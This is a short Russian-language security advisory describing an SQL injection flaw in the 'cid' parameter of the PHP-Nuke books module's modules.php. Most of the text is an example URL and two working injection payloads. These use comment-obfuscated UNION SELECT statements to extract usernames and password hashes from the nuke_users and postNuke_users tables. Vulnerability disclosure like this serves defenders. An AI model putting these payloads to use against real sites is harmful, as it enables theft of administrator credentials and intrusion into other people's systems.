Программа: PHP-Nuke Module books SQL

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «cid» сценарием modules.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

http://www.xxxx/modules.php?op=modload&name=books&file=index&req=view_cat&cid= {exploit}

90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/* */char(111,112,101,114,110,97,108,101,51),concat(pn_uname,0x3a,pn_pass)+from%2F%2A%2A%2Fnuke_users/*where%20admin%201=%201

90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/* */char(121,122,111,104,110,97,112,101,54),concat(pn_uname,0x3a,pn_pass) +from%2F%2A%2A%2FpostNuke_users/*where%20admin%201=%201



Оставить мнение